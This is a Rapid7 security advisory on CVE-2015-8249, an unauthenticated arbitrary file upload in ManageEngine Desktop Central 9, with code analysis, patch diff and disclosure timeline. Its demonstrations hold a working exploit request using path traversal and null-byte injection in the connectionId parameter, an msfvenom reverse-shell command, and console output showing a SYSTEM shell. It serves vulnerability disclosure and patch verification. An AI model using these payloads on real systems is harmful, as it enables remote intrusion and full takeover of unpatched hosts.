Last updated at Thu, 28 Dec 2023 18:31:06 GMT

ManageEngine Desktop Central 9 suffers from a vulnerability that allows a remote attacker to upload a malicious file, and execute it under the context of SYSTEM. Authentication is not required to exploit this vulnerability.

In addition, the vulnerability is similar to a ZDI advisory released on May 7th, 2015, ZDI-15-180. This advisory specifically mentions computerName, and this is an important piece of information.  First off, computerName is a parameter in FileUploadServlet, which is used to normalize a file path for our uploaded 7z file. From the sound of it, this parameter was not properly checked, or not checked at all for any path injection attacks. A patch was released by the vendor, and upgrading to Version 9, build 90142 should address this vulnerability.

Although the latest version of ManageEngine Desktop Central 9 does check for multiple things such as directory traversal, absolute path injection, and potentially dangerous executables for computerName, it isn't the only parameter that is user-supplied and part of the file path. The connectionId parameter is also user-supplied, and is part of the file path for our uploaded file.

From the look of the decompiled code, this does not appear to be a regression bug; rather, the fix was incomplete.


This issue was discovered by Wei Chen of Rapid7, Inc., and reported to the vendor per Rapid7's disclosure policy.

Tested & Analyzed Versions

Builds 90109 and 91084 were tested and found to be vulnerable to CVE-2015-8249. At the time of discovery, build 91084 was the latest available version.

Fixed version

Build 91093 was released on November 30, 2015, and fixes the issue described by CVE-2015-8249. See the Patch Analysis section, below, for details.

Code Analysis

The FileUploadServlet class begins handling our POST request in the doPost function. In this function, you will see that the variable compName is checked by FileUploadUtil.hasVulnerabilityInFileName.  That is the function for checking things like directory traversal, absolute path injection, and executable file types (such as jsp, js, and html)

After the compName check, you will see that it calls a downLoadFile() function.

public void doPost(HttpServletRequest request, HttpServletResponse response)  
    throws ServletException, IOException  
    String sourceMethod = "FileUploadServlet::doPost";  
    this.logger.log(Level.INFO, sourceMethod + " -> Received request from : " + request.getRemoteHost());  
    connectionId = request.getParameter("connectionId");  
    resourceId = request.getParameter("resourceId");  
    action = request.getParameter("action");  
    compName = request.getParameter("computerName");  
    customerId = Long.valueOf(Long.parseLong(request.getParameter("customerId")));  
    nDataLength = request.getContentLength();  
    checkSumValue = request.getParameter("checkSumValue");  
      if ((compName != null) && (FileUploadUtil.hasVulnerabilityInFileName(compName)))  
        this.logger.log(Level.WARNING, "FileUploadServlet : Going to reject the request: compName: {0}", new Object[] { compName });  
        response.sendError(403, "Request Refused");  
      nDataLength = request.getContentLength();  
      long freeSpace = RDSUtil.getInstance().getServerFreeSpace();  
      if (nDataLength < freeSpace)  
        String receivedStatus = downLoadFile(request);  
        response.setHeader("Upload_Status", receivedStatus);  
        this.logger.log(Level.WARNING, sourceMethod + " -> No required Space is availbale to store the video file ");  
        if ((action != null) && (action.equalsIgnoreCase("rds_file_upload"))) {  
          throw new SyMException(3010, "No Space to store Video file ", new Exception("No Space to store Video file"));  
      this.logger.log(Level.INFO, sourceMethod + " -> The method ended ");  
    catch (SyMException exp)  
      int errorCode = exp.getErrorCode();  
      String errorMessage = exp.getMessage();  
      this.logger.log(Level.WARNING, sourceMethod + " -> Exception occured : " + errorCode);  
      this.logger.log(Level.WARNING, sourceMethod + " -> Exception occured : " + errorMessage);  
      RdsHistoryDetails.getInstance().updateErrorCode(resourceId, connectionId, errorCode);  
    catch (Exception ex)  
      this.logger.log(Level.WARNING, sourceMethod + " -> Exception occured : " + ex);  

The downLoadFile() function is used to actually save our uploaded file. An attacker can upload whatever he wants:

private String downLoadFile(HttpServletRequest request)  
    String status = "Success";  
      String sourceMethod = "FileUploadServlet::downLoadFile";  
      InputStream appIn = request.getInputStream();  
      String absoluteFileName = getFileFolderPath();  
      if ((action != null) && (action.equalsIgnoreCase("rds_file_upload")))  
        HashMap resMap = new HashMap();  
        resMap.put("fileStatus", Integer.valueOf(3));  
        resMap.put("connectionID", connectionId);  
        resMap.put("filePath", absoluteFileName);  
        resMap.put("fileSize", Long.valueOf(nDataLength));  
      OutputStream outputFile = new FileOutputStream(absoluteFileName);  
      this.logger.log(Level.INFO, sourceMethod + "  ==========> Method Starts  <===========");  
        int numread = 0;  
        int count = 0;  
        byte[] bytesread = new byte[262144];  
        long receivedFileSize = 0L;  
        this.logger.log(Level.INFO, sourceMethod + " -> Total Received Data length = : " + nDataLength);  
        while ((appIn != null) && ((numread = != -1))  
          this.logger.log(Level.FINE, sourceMethod + " -> Going to write the file: count: " + count + " numread :" + numread);  
          outputFile.write(bytesread, 0, numread);  
          receivedFileSize += numread;  
          this.logger.log(Level.FINE, sourceMethod + " -> receivedFileSize: " + receivedFileSize);  
        String checkSum = ChecksumProvider.getInstance().GetMD5HashFromFile(absoluteFileName);  
        this.logger.log(Level.INFO, sourceMethod + " Generated checksum value is : " + checkSum);  
        if ((nDataLength == receivedFileSize) && (checkSum.equals(checkSumValue)))  
          this.logger.log(Level.INFO, sourceMethod + " -> Received whole file successfully ");  
          if ((action != null) && (action.equalsIgnoreCase("rds_file_upload")))  
            HashMap resMap = new HashMap();  
            resMap.put("fileStatus", Integer.valueOf(0));  
            resMap.put("connectionID", connectionId);  
            resMap.put("filePath", absoluteFileName);  
            resMap.put("fileSize", Long.valueOf(nDataLength));  
          status = "Failed";  
      catch (Exception e)  
        this.logger.log(Level.WARNING, " -> Exception occured while writing file: " + e);  
      this.logger.log(Level.INFO, sourceMethod + "  ==========> Method Ends  <===========");  
    catch (Exception e)  
      this.logger.log(Level.WARNING, " -> Exception occured : " + e);  
    return status;  

However, taking a closer look at the absoluteFileName variable, we can see that this variable is obtained from the getFileFolderPath() function:

 public String getFileFolderPath()  
      String sourceMethod = "FileUploadServlet::getFileFolderPath";  
      String absoluteFileFolderPath = null;  
      this.logger.log(Level.INFO, sourceMethod + " -> Action : " + action);  
      if ((action != null) && (action.equalsIgnoreCase("rds_file_upload")))  
        String server_home = DCMetaDataUtil.getInstance().getServerDataDir(customerId);  
        this.logger.log(Level.FINE, sourceMethod + " -> The server home path is : " + server_home);  
        absoluteFileFolderPath = server_home + File.separator + RDSUtil.RDS_SCRREC_FOLDER;  
      if (!ApiFactory.getFileAccessAPI().isFileExists(absoluteFileFolderPath)) {  
      this.logger.log(Level.FINE, sourceMethod + " -> The Absolute File Folder Path is  : " + absoluteFileFolderPath);  
      String absoluteFileName = getAbsoluteFileName(absoluteFileFolderPath);  
      this.logger.log(Level.INFO, sourceMethod + " -> The Absolute Path with File Name is  : " + absoluteFileName);  
      return absoluteFileName;  
    catch (Exception e)  
      this.logger.log(Level.WARNING, " -> Exception occured : " + e);  
    return null;  

getFileFolderPath() is sort of a wrapper for getAbsoluteFileName, so we look at that:

public String getAbsoluteFileName(String fileFolder)  
    String sourceMethod = "FileUploadServlet::getAbsoluteFileName";  
      String absoluteFileName = null;  
      if ((action != null) && (action.equalsIgnoreCase("rds_file_upload")))  
        String userName = getUserNamefromDO(connectionId);  
        String fileName = userName + "-" + compName + "-" + connectionId;  
        absoluteFileName = fileFolder + File.separator + fileName + ".7z";  
        HashMap resMap = new HashMap();  
        resMap.put("connectionID", connectionId);  
        resMap.put("filePath", absoluteFileName);  
        resMap.put("fileStatus", Integer.valueOf(1));  
        resMap.put("fileSize", Long.valueOf(nDataLength));  
        this.logger.log(Level.FINE, sourceMethod + " --> The Absolute Path with File Name is  : " + absoluteFileName);  
      this.logger.log(Level.FINE, sourceMethod + " --> The Absolute Path with File Name is  : " + absoluteFileName);  
      return absoluteFileName;  
    catch (Exception e)  
      this.logger.log(Level.WARNING, sourceMethod + " --> Exception occured : " + e);  
    return null;  

Pay attention to the fileName variable above. As we can see, there are three variables used to craft this filename: userName, compName, and connectionId. Remember, compName is already checked for malicious inputs in the doPost() function, but throughout the code flow, the connectionId is never checked, and the attacker has control of it.

Attacker's Notes

For connectionId, we can inject a null byte to modify the file extension. For example, if we do evil.jsp%00, our filename becomes "evil.jsp" instead of "evil.jsp.7z".  Since ManageEngine Desktop Central 9 is Java, and runs on top of Apache, it should support JSP and PHP. However, we cannot just upload our JSP/PHP file to the server-data directory (where the FileUploadServlet class puts all the 7z files), the server won't treat them as executables. We have to put our malicious file somewhere else. To solve this, we can simply traverse our way to a different directory using "..". In our attack, we choose the following to plant our JSP payload:

Build 90109:


Build 91084 (it's a different path because this version no longer has the jsp directory):


It may be possible to find a path that's compatible with either version, but earlier versions were not investigated.

Demonstration 1 (PoC)

Tested Environments:

  • Windows 7 SP1 (x86)
  • ManageEngine Desktop Central 9 Build 91084


1. Create the following file as /tmp/a.txt (this is your payload):

<%= new String("Hello!") %>  

2. Run the following. You should get a "Hello!" as the response for the second curl command.

msf sinn3r $ curl -v -X POST "" --data @/tmp/a.txt --header "Content-Type:application/octet-stream" &&  
* Hostname was NOT found in DNS cache  
*   Trying  
* Connected to ( port 8020 (#0)  
> POST /fileupload?connectionId=AAAAAAA%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cjspf%5ctest.jsp%00&resourceId=B&action=rds_file_upload&computerName=sinn3r%2ephp&customerId=47474747 HTTP/1.1  
> User-Agent: curl/7.37.1  
> Host:  
> Accept: */*  
> Content-Type:application/octet-stream  
> Content-Length: 27  
* upload completely sent off: 27 out of 27 bytes  
< HTTP/1.1 200 OK  
< Date: Fri, 09 Oct 2015 20:06:23 GMT  
* Server Apache is not blacklisted  
< Server: Apache  
< Upload_Status: Failed  
< Content-Length: 0  
< X-dc-header: yes  
* Connection #0 to host left intact  
-bash: No such file or directory  
msf sinn3r $ curl  
Hello!msf sinn3r $  

Demonstration 2 (real attack)

Tested Environments:

  • Windows 7 SP1 (x86)
  • ManageEngine Desktop Central 9 Build 91084


1. Create a JSP shell

./msfvenom -p java/jsp_shell_reverse_tcp lhost=IP lport=4444 -f raw > /tmp/a.txt  

2. Start a payload handler

3. Upload and JSP payload and execute it:

msf sinn3r $ curl -v -X POST "" --data @/tmp/a.txt --header "Content-Type:application/octet-stream" &&  
* Hostname was NOT found in DNS cache  
*   Trying  
* Connected to ( port 8020 (#0)  
> POST /fileupload?connectionId=AAAAAAA%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cjspf%5ctest.jsp%00&resourceId=B&action=rds_file_upload&computerName=sinn3r%2ephp&customerId=47474747 HTTP/1.1  
> User-Agent: curl/7.37.1  
> Host:  
> Accept: */*  
> Content-Type:application/octet-stream  
> Content-Length: 1440  
> Expect: 100-continue  
< HTTP/1.1 100 Continue  
< HTTP/1.1 200 OK  
< Date: Sat, 10 Oct 2015 18:14:00 GMT  
* Server Apache is not blacklisted  
< Server: Apache  
< Upload_Status: Failed  
< Content-Length: 0  
< X-dc-header: yes  
* Connection #0 to host left intact  
-bash: No such file or directory  
msf sinn3r $ curl  
msf sinn3r $  

4. On msfconsole, we see that we have a shell under the context of SYSTEM:

msf exploit(handler) > run  
[*] Started reverse handler on  
[*] Starting the payload handler...  
[*] Command shell session 1 opened ( -> at 2015-10-10 13:14:08 -0500  
Microsoft Windows [Version 6.1.7601]  
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.  
nt authority\system  

Patch Analysis

The patch can be analyzed by decompiling the FileUploadServlet class from AdventNetDesktopCentral.jar, and then diff against the vulnerable version:

$ diff  
<  public void doPost(HttpServletRequest request, HttpServletResponse response)  
>   public void doPost(HttpServletRequest request, HttpServletResponse response)  
<       if ((compName != null) && (FileUploadUtil.hasVulnerabilityInFileName(compName)))  
>       if (((compName != null) && (FileUploadUtil.hasVulnerabilityInFileName(compName))) || ((connectionId != null) && (!StringUtils.isNumeric(connectionId.trim()))))  
<         this.logger.log(Level.WARNING, "FileUploadServlet : Going to reject the request: compName: {0}", new Object[] { compName });  
>         this.logger.log(Level.WARNING, "FileUploadServlet : Going to reject the request: compName:{0}, connectionId: {1}", new Object[] { compName, connectionId });  

The above patch roughly shows the connectionId parameter is being checked by a StringUtils.isNumeric method. The API documention for StringUtils.isNumeric can be found [here]( This seems to be an appropriate way to fix the vulnerability.

To see what actually happens after the check, we need to see the doPost method.

It looks like it simply sends a 403 HTTP response to the client, and then return, which prevents us from reaching the downloadFile() method that we need to upload an arbitrary file:

public void doPost(HttpServletRequest request, HttpServletResponse response)  
    throws ServletException, IOException  
    String sourceMethod = "FileUploadServlet::doPost";  
    this.logger.log(Level.INFO, sourceMethod + " -> Received request from : " + request.getRemoteHost());  
    connectionId = request.getParameter("connectionId");  
    resourceId = request.getParameter("resourceId");  
    action = request.getParameter("action");  
    compName = request.getParameter("computerName");  
    customerId = Long.valueOf(Long.parseLong(request.getParameter("customerId")));  
    nDataLength = request.getContentLength();  
    checkSumValue = request.getParameter("checkSumValue");  
      if (((compName != null) && (FileUploadUtil.hasVulnerabilityInFileName(compName))) || ((connectionId != null) && (!StringUtils.isNumeric(connectionId.trim()))))  
        this.logger.log(Level.WARNING, "FileUploadServlet : Going to reject the request: compName:{0}, connectionId: {1}", new Object[] { compName, connectionId });  
        response.sendError(403, "Request Refused");  

Patch Testing

By trying the Metasploit module against the patched ManageEngine, the application is no longer exploited:

msf exploit(manageengine_connectionid_exec) > run  
[*] Started reverse handler on  
[*] Creating JSP stager  
[*] Uploading JSP stager test.jsp...  
[-] Exploit aborted due to failure: unknown: The server returned 403, but 200 was expected.  
[!] This exploit may require manual cleanup of '../webapps/DesktopCentral/jspf/test.jsp' on the target  
msf exploit(manageengine_connectionid_exec) >  

Disclosure Timeline

This issue was reported to the vendor per Rapid7's disclosure policy.

  • Sun, Oct 11, 2015: Vulnerability discovered by Wei Chen of Rapid7, Inc.
  • Mon, Oct 12, 2015: Contacted vendor
  • Tue, Oct 19, 2015: Vendor provided contact e-mail (
  • Wed, Oct 20, 2015: Draft details disclosed to vendor
  • Mon, Nov 02, 2015: Vendor confirmed the vulnerability
  • Mon, Nov 23, 2015: Disclosed to CERT, CVE-2015-8249 assigned
  • Wed, Nov 25, 2015: Patched version 91093 released
  • Mon, Nov 30, 2015: Patch confirmed as effective
  • Mon, Dec 14, 2015: Public Disclosure, Metasploit module proposed as PR6344.